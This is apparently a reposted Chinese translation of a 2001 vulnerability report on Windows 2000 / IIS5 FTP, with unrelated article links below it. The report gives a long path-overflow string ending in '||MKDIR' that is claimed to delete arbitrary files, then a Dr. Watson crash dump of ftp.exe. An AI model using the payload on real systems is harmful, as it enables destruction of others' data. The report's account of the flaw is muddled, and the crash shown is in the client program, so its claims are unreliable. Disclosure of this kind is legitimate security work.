[系统漏洞]IIS5ftp允许任何登录用户删除任何文件的漏洞--

2022-07-14科技163

  Antti.Hakulinen@fi.flextronics.com

  IT Assistant          Flextronics Design Finland

  翻译:

  shotgun@xici.net

  微软的FTP服务器允许任何用户删除任何文件。(包括匿名用户)

  受影响系统:Win2000 build 2195 SP1

  使用以下的GET命令:

  C:\FTP target machine

  ftp get \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

  \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\A

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR c:\downloads\mp3\1.mp3

  --- PORT 212,246,182,42,5,52

  200 PORT command successful.

  --- RETR \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR

  500 Command was too long

  这样,任何你放在||MKDIR 后面的文件将会被删除,只要你能知道文件的确切位置,你就可以删除系统上的任何文件

  以下是受攻击系统的DRWTSN32.LOG文件

  Application exception occurred:

      App: ftp.exe (pid=824)

      When: 2/16/2001 @ 00:04:23.868

      Exception number: c0000005 (access violation)

  *---- System Information ----*

      Computer Name: DIVINE

      User Name: Administrator

      Number of Processors: 1

      Processor Type: x86 Family 6 Model 3 Stepping 0

      Windows 2000 Version: 5.0

      Current Build: 2195

      Service Pack: None

      Current Type: Uniprocessor Free

      Registered Organization: xxxxxxxxxxxxxxxx

      Registered Owner: xxxxxxxxxxxxxxxx

  *---- Task List ----*

    0 Idle.exe

    8 System.exe

  140 smss.exe

  164 csrss.exe

  160 winlogon.exe

  212 services.exe

  224 lsass.exe

  384 svchost.exe

  412 SPOOLSV.exe

  444 svchost.exe

  484 regsvc.exe

  500 mstask.exe

  556 tcpsvcs.exe

  568 snmp.exe

  616 winmgmt.exe

  648 inetinfo.exe

  1080 explorer.exe

  1212 internat.exe

  628 msimn.exe

  828 SETI@home.exe

  892 cmd.exe

  1280 mdm.exe

  824 ftp.exe

  1240 drwtsn32.exe

    0 _Total.exe

  (01000000 - 0100F000)

  (77F80000 - 77FF9000)

  (75050000 - 75058000)

  (77E80000 - 77F36000)

  (75030000 - 75044000)

  (78000000 - 78046000)

  (77DB0000 - 77E0A000)

  (77D40000 - 77DAF000)

  (75020000 - 75028000)

  (74FF0000 - 75002000)

  (77E10000 - 77E75000)

  (77F40000 - 77F7C000)

  (77980000 - 779A4000)

  (77840000 - 7784C000)

  (777E0000 - 777E8000)

  (77950000 - 77979000)

  (777F0000 - 777F5000)

  (77830000 - 7783E000)

  (74FD0000 - 74FE1000)

  (75010000 - 75017000)

  State Dump for Thread Id 0x324

  eax=0006ffb0 ebx=00000000 ecx=00000000 edx=010077c0 esi=00737973 edi=00000001

  eip=780121b2 esp=0006f758 ebp=0006f780 iopl=0     nv up ei ng nz na po nc

  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000       efl=00000286

  function: fclose

      78012192 686af50078    push  0x7800f56a

      78012197 64a100000000   mov   eax,fs:[00000000]   fs:00000000=????????

      7801219d 50        push  eax

      7801219e 64892500000000  mov   fs:[00000000],esp   fs:00000000=????????

      780121a5 83ec0c      sub   esp,0xc

      780121a8 53        push  ebx

      780121a9 56        push  esi

      780121aa 57        push  edi

      780121ab 834de4ff     or  dword ptr [ebp+0xe4],0xff ss:00b3cd56=????????

      780121af 8b7508      mov   esi,[ebp+0x8]     ss:00b3cd56=????????

  FAULT -780121b2 f6460c40     test  byte ptr [esi+0xc],0x40   ds:01204f49=??

      780121b6 7416       jz   wexecve+0x14f (7801a4ce)

      780121b8 83660c00     and  dword ptr [esi+0xc],0x0 ds:01204f49=????????

      780121bc 8b45e4      mov   eax,[ebp+0xe4]     ss:00b3cd56=????????

      780121bf 8b4df0      mov   ecx,[ebp+0xf0]     ss:00b3cd56=????????

      780121c2 64890d00000000  mov   fs:[00000000],ecx   fs:00000000=????????

      780121c9 5f        pop   edi

      780121ca 5e        pop   esi

      780121cb 5b        pop   ebx

      780121cc c9        leave

      780121cd c3        ret

      780121ce 56        push  esi

  *---- Stack Back Trace ----*

  FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name

  0006F780 01001E67 00737973 00000000 010018D3 77E9B3C1 !fclose

  0006FF70 010054EF 00000001 00283724 00282980 77E9B3C1 ftp!nosymbols

  0006FFC0 77E87903 77E9B3C1 0012F88F 7FFDF000 C0000005 ftp!nosymbols

  0006FFF0 00000000 010053F0 00000000 000000C8 00000100 kernel32!SetUnhandledExceptionFilter

  *---- Raw Stack Dump ----*

  0006f758 01 00 00 00 00 00 00 00 - 00 00 00 00 ff ff ff ff ................

  0006f768 c0 77 00 01 a4 f3 06 00 - b0 ff 06 00 6a f5 00 78 .w..........j..x

  0006f778 d0 4a 03 78 ff ff ff ff - 70 ff 06 00 67 1e 00 01 .J.x....p...g...

  0006f788 73 79 73 00 00 00 00 00 - d3 18 00 01 c1 b3 e9 77 sys............w

  0006f798 8f f8 12 00 00 f0 fd 7f - 43 3a 5c 00 ff ff ff ff ........C:\.....

  0006f7a8 20 f8 06 00 8f 85 f8 77 - 00 00 00 01 85 71 e8 77  ......w.....q.w

  0006f7b8 a1 71 e8 77 bd 5b f9 77 - a0 f8 06 00 00 00 00 00 .q.w.[.w........

  0006f7c8 00 e0 fd 7f 00 f8 06 00 - 06 00 00 00 e4 f7 06 00 ................

  0006f7d8 00 00 00 00 6e b5 f8 77 - 27 38 f9 77 00 00 04 00 ....n..w'8.w....

  0006f7e8 d0 00 00 01 37 00 00 00 - 00 00 00 00 45 f0 fd 7f ....7.......E...

  0006f7f8 00 00 00 00 00 f0 fd 7f - 00 02 00 00 20 00 00 00 ............ ...

  0006f808 06 00 00 00 06 00 00 00 - cc f8 06 00 fd 13 ea 77 ...............w

  0006f818 c0 71 e8 77 ff ff ff ff - 70 f8 06 00 8c 7c e8 77 .q.w....p....|.w

  0006f828 00 00 00 00 5c f8 06 00 - 00 00 00 00 98 98 f8 77 ....\..........w

  0006f838 00 00 07 00 30 2f 07 00 - 00 00 00 00 38 f8 06 00 ....0/......8...

  0006f848 88 06 07 00 ec f8 06 00 - db 80 fb 77 d0 98 f8 77 ...........w...w

  0006f858 ff ff ff ff fc f8 06 00 - ec 9c fc 77 a8 07 07 00 ...........w....

  0006f868 38 2f 07 00 2c 12 ff 74 - c8 2c 07 00 00 00 00 00 8/..,..t.,......

  0006f878 01 00 00 00 2c 12 ff 74 - f0 f8 06 00 00 00 00 00 ....,..t........

  0006f888 9c f8 06 00 3a 6a f8 77 - 00 00 00 00 70 f9 99 77 ....:j.w....p..w

  State Dump for Thread Id 0x4a8

  eax=778321fe ebx=00000003 ecx=7ffde000 edx=00000000 esi=77f87e6c edi=00000003

  eip=77f87e77 esp=0072fd24 ebp=0072fd70 iopl=0     nv up ei pl zr na po nc

  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000       efl=00000246

  function: ZwWaitForMultipleObjects

      77f87e6c b8e9000000    mov   eax,0xe9

      77f87e71 8d542404     lea   edx,[esp+0x4]     ss:011fd2fb=????????

      77f87e75 cd2e       int   2e

      77f87e77 c21400      ret   0x14

      77f87e7a 668b08      mov   cx,[eax]          ds:778321fe=8b55

      77f87e7d 40        inc   eax

      77f87e7e 40        inc   eax

      77f87e7f 8945a4      mov   [ebp+0xa4],eax     ss:011fd346=????????

      77f87e82 6685c9      test  cx,cx

      77f87e85 75f3       jnz  RtlExpandEnvironmentStrings_U+0x26 (77f8e57a)

      77f87e87 663930      cmp   [eax],si          ds:778321fe=8b55

      77f87e8a 75ee       jnz   ZwFsControlFile+0x54 (77f8bf7a)

      77f87e8c 40        inc   eax

      77f87e8d 40        inc   eax

      77f87e8e 8945a4      mov   [ebp+0xa4],eax     ss:011fd346=????????

  *---- Stack Back Trace ----*

  FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name

  0072FD70 77E9E68A 0072FD48 00000001 00000000 00000000 ntdll!ZwWaitForMultipleObjects

  0072FFB4 77E92CA8 00000004 0007BCDC 7FFDE000 0007C6E8 kernel32!WaitForMultipleObjects

  0072FFEC 00000000 00000000 00000000 00000000 00000000 kernel32!CreateFileA

  Regards: Antti Hakulinen

         Antti Hakulinen        Antti.Hakulinen@fi.flextronics.com

         IT Assistant           Flextronics Design Finland

  有人用微软的FTP么?那个东西又不好功能又差,不如去用Serv-U了。

  变态:最近安全届的家伙疯了一样的发现漏洞,前一阵子不知道去哪里了。

分享给朋友:
返回列表

上一篇:博隆防水堵漏指南:化学灌浆可以解决下述问题

下一篇:扬州历史上属于过安徽吗?有什么历史依据?

相关文章

玩辐射3的配置要什么合适?

最低硬件配置为: 操作系统 Windows XP/Vista 系统内存 1GB(XP) / 2GB(Vista) 处理器 Intel Pentium 4 2.4G,或与此相当 显卡 Direct X 9.0c兼容显卡,至少256MB显存(NVIDIA 6800或更佳 / ATI X850或更佳) 推...

小红头和大红头文件的区别?

大红头和往往与所发文件字头使用的字的大小有关,当然,红头也和文件的发文字号有关。 公文一般由份号、密级和保密期限、紧急程度、发文机关标志、发文字号、签发人、标题、主送机关、正文、附件说明、发文机关署名、成文日期、印章、附注、附件、抄送机关、印发机关和印发日期、页码等组成。 所谓大红头,就是以政府的名...

android可以将jar包放在jnilibs目录下吗?

1先在Android studio导入一个项目,然后进入到项目中,依次进入到app>>src>>main下。2在main的文件下进行创建一个jinlibs,然后选中main的文件,进行右键,弹出框中点击“new”,移动下一级菜单中选择“directory”。3对创建的文件夹进...

首都机场T2航站楼实现“人脸识别”快速过安检( )

  首都机场在全国率先实现“人脸识别”安检,目前在T2航站楼试用,新安检系统将大幅缩减旅客过安检通道时间。   记者从首都机场获悉,经过两年多研发,首都机场在全国率先启动“智能旅客安检系统”。   近日,记者在首都机场T2航站楼国内出港的2号安检通道看到,新上岗的智能安检系统已在部分安检通道开启...

有没有女主不崩人设的快穿推荐?

1.《穿成反派的锦鲤亲妈[快穿]》作者:三生思量 穷癌晚期的黎夏重生后发现自己成了一个花钱系统选中的锦鲤。系统主线任务:穿越到各个世界成为反派他最有钱的亲妈,扶正反派的三观,防止儿子黑化。系统支线任务:系统提供无限量资金,花钱打脸,逆转人生!本文为神壕流爽文,该文剧情紧凑,文风轻松,代入感极强,值得...

电脑c盘里有一个文件叫Users。这是什么文件我把它移到D盘以后重启电脑发现桌面上什么都没有了?

Users这个文件夹直译过来就是用户(们),这里面包含着使用这个计算机的所有用户(如果是普通的话),里面存着的用户也包括你,一般没有改名字默认的就叫做Administrator。桌面在这个文件夹里以文件夹的形式呈现着。可以简单的理解成你平常用的东西都在这里,只不过每次开机都会自动打开桌面这个文件夹罢...

曾经塞班系统为何中国不能买来加以改进,或许也能做到和苹果一样?

在中国很多企业都开始研究系统了,无论是电脑系统还是手机系统,以及未来服务很多终端的系统,这都是中国的自主化研发力量的体现,首先我们不说技术的方面的问题,就说可以引进来进行改进,那么以后做好了也会落下话柄; 中国企业之所以要做系统的目的第一方面不受制于人,做属于自己的科技系统,也不至于需要企业通过大量...

安卓SD卡文件夹分别是什么意思,文件夹功能介绍?

  underess文件夹,一个游戏的附属文件夹,Ringtones文件夹,存放音乐和铃声的文件夹。   AutolnstallAPK文件夹,这个文件夹的作用是:当你把你需要安装的软件安装包apk放到里面,下次你刷完固件后,机器会默认一起安装此文件夹里的软件。   libs文件夹该文件夹是存放安装文...

网络舆情的监测与分析研判如何做好?

网络舆情的监测与分析研判最好是借助专业的舆情监测系统来做,人工只是做辅助的监测分析研判,这样就能做好舆情监测和分析。专业的舆情监测系统可以提供全网信息监测,同时可以做到实时监测,及时预警,而且现在还有移动端的使用,这很大程度上为舆情工作者提供了便利。系统还支持自动分析研判,统计分析,但是如果需要复杂...

有什么好用的下载工具?

PC端资源下载工具XDown,11MB/S其实找资源不是难事,最难的是找到资源却要面对几十Kb/s的速度才是最糟心的,那今天的分享你可得仔细看咯! 要将这些工具下载至本地我们就需要一些下载工具了,目前常用的一些工具有迅雷、闪电下载、雷电下载、XDown、μTorrent、qBittorrent、Mo...

娱乐圈421代表什么?

指网络上流传的一份421页的明星八卦。 421页讲的全部是各种明星的八卦绯闻,因此网友们就用“421”代指这份文件。该文件还做了分类和目录,但具体内容的真实性值得商榷。“421”吸引了很多人的关注和下载, 但是有一些人利用这个文件行骗,例如:说自己卖真实的421文件,多少钱一份,这种一般是骗钱的,需...

地震真的可以预警吗?

根据中国地震台网测定,确认本月17日22时55分在四川省宜宾市长宁县附近发生了6级地震,震源深度16千米,值得注意的是,在地震发生期间,四川多地通过警报,电视,手机等方式进行了提前61秒的地震波预警,给人员疏散以及规避提供了宝贵时机。 这正是成都高新减灾研究所建立的大陆地震预警网系统在发挥作用,其原...

Copyright © sosowu.com蜀ICP备19033681号-2